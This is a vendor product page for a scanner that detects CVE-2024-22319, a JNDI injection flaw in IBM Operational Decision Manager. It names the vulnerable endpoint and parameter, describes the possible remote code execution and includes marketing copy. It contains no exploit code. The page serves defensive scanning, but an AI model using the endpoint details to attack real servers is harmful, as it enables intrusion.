CVE-2024-22319 Scanner
Detects 'JNDI Injection' vulnerability in IBM Operational Decision Manager affects v. 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1.
Short Info
Level
Critical
Single Scan
Single Scan
Can be used by
Asset Owner
Estimated Time
10 sec
Time Interval
792 sec
Scan only one
Url
Toolbox
-
Vulnerability Overview
IBM Operational Decision Manager versions 8.10.3 to 8.12.0.1 contain a JNDI injection flaw that arises when unchecked arguments are passed to a specific API. This vulnerability exposes the system to remote attackers who can exploit it to execute arbitrary code.
Vulnerability Details
The vulnerability specifically affects the decisioncenter-api/v1/about
endpoint, where an unchecked datasource
parameter can lead to JNDI injection. Exploiting this flaw requires crafting a malicious URL that, when processed by the IBM ODM server, triggers the JNDI injection and potentially leads to remote code execution.
Possible Effects
- Unauthorized execution of arbitrary code on the server.
- Potential compromise of the IBM ODM server and associated data.
- Unauthorized access to sensitive information.
Why Choose S4E
S4E offers a comprehensive vulnerability scanning solution that helps protect your systems from threats like JNDI injection in IBM ODM:
- Detailed vulnerability insights and actionable intelligence.
- Customized remediation guidance to address detected vulnerabilities.
- Continuous updates and support to keep your environment secure against emerging threats.
References
- IBM Security Advisory
- NVD - CVE-2024-22319